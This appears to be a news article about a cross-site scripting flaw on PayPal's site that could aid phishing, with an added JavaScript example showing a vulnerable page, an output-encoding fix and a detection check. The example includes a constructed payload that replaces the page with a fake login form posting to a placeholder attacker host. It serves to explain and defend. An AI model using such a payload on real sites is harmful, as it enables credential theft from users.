Cross-Site Scripting Vulnerability On PayPal Could Be Used In Phishing Attacks
A cross-site scripting (XSS) vulnerability has been found on the website of PayPal, the online payment processor. The flaw lets an attacker inject script that runs in visitors' browsers in the context of the paypal.com origin, and it could be used in a phishing attack to gather data from unsuspecting users.
Because the injected script runs on a page the browser genuinely loaded from paypal.com, a malicious attacker can construct content that appears to be on the paypal.com domain name. This fraudulent content could imitate the PayPal login page and harvest account details. By adding their own content to the real site, attackers could carry out highly believable attacks that mislead unsuspecting users.
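The following is an added illustration, not PayPal's code and not the flaw Netcraft reported: a hypothetical page that reflects a search parameter into its HTML, shown in its vulnerable form beside the output-encoded fix, together with a constructed payload of the kind the attack above relies on (a script that replaces the real page with a look-alike login form posting to a placeholder attacker host). The parameter name `q`, the host `attacker.invalid` and all function names are assumptions for the example.

```javascript
// Added example (hypothetical site, not PayPal's code): reflected XSS and its fix.
// The page echoes an assumed "q" search parameter back into the HTML body.

// Vulnerable: untrusted input is concatenated straight into the markup, so a
// value such as "<script>...</script>" becomes live script on the site's own
// origin, over the site's own TLS connection. The browser has no way to tell it
// from script the operator intended to serve.
function renderSearchUnsafe(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Fix: encode the five HTML-significant characters before interpolating into
// an HTML text node. Encoding has to match the context; this helper is only
// correct for element content, not for attributes, URLs or inline JavaScript.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

function renderSearchSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Constructed payload (not taken from any real attack): once running on the
// victim's origin it swaps the page body for a fake login form whose action
// points at an attacker-controlled host. "attacker.invalid" is a placeholder.
const PHISHING_PAYLOAD =
  "<script>document.body.innerHTML='" +
  '<form action="https://attacker.invalid/collect" method="post">' +
  'Email <input name="u"> Password <input name="p" type="password">' +
  "<button>Log In</button></form>'</script>";

// Crude check for a test or review: does a raw <script> tag survive in output
// where only text was expected?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Demonstration when run stand-alone with node.
console.log("unsafe render contains live script:",
  containsLiveScript(renderSearchUnsafe(PHISHING_PAYLOAD)));
console.log("safe render contains live script:  ",
  containsLiveScript(renderSearchSafe(PHISHING_PAYLOAD)));
```

The point the example makes about the EV certificate discussed below is that the fake form in the unsafe render is delivered by the genuine site: the address bar, the certificate and the connection are all PayPal's, so only the server-side fix (encoding untrusted data for the context it is written into) removes the attack surface.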
According to Netcraft, the vulnerability is made worse by the fact that the affected page uses an Extended Validation SSL certificate, which causes the browser's address bar to turn green, assuring visitors that the site belongs to PayPal. That assurance is accurate yet of no help here: the certificate vouches for who operates the site, not for the integrity of the page content, and script injected through the XSS flaw arrives over the same authenticated connection as the rest of the page. Two years ago, a similar vulnerability was discovered on a different page of the PayPal site, which also used an SSL certificate.
The vulnerability was discovered a month after PayPal published a new approach to fighting phishing, under which browsers that do not support EV certificates are to be considered unsafe and customers who access the PayPal website with such browsers will be blocked.
The vulnerability has been reported to PayPal.